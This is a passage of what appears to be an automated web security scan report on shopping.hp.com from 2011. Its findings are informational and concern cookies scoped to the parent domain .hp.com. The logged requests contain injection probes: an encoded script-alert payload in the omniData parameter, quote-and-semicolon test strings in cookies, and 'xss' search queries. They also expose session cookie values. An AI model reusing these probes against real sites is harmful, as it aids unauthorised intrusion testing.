ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 402159


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.12. http://www.shopping.hp.com/webapp/shopping/home.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

3.13. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/mpss_portal.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=19; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; 
s_cc=true; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS_HP_CLICKS=4x17x11042; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fmpss_portal.do_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CArticle%25257CHP%252520CoolSense%252520Technology%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fcache%25252F596786-0-0-225-121.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 140544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<style type="text/css">
.NewMpss{float
...[SNIP]...

3.14. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_advisor.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=24; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11190; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fseries_can.do%25253FstoreName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-One%25252BPCs%252526jumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252FAll-in-One_PCs%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fproduct_advisor.do%25253Flanding%25253Ddesktops%252526storeName%25253Dcomputer_st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 166238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html lang="en">
<head>
<style ty
...[SNIP]...

3.15. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...

3.16. http://www.shopping.hp.com/webapp/shopping/product_detail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:08:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 227618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

3.17. http://www.shopping.hp.com/webapp/shopping/search_request.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: hpcompc_usen, hpcomsh_usen and hho_omni_usen (all Domain=.hp.com, issued by www.shopping.hp.com, so they are sent to every host under hp.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/search_request.do;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?searchType=keyword&inkTonerSearchQuery=&pageName=home&Printer_Search_Query=&Cartridge_Search_Query=&printerOrCartridgeSearch=&locationOfSearchQuery=&returnUrlQueryString=&searchQuery=xss+printer HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlkviNuV2Qh%2FMS3uvFPdcQKd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=6; s_var_20=in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Aprinters%20%26%20all-in-ones; 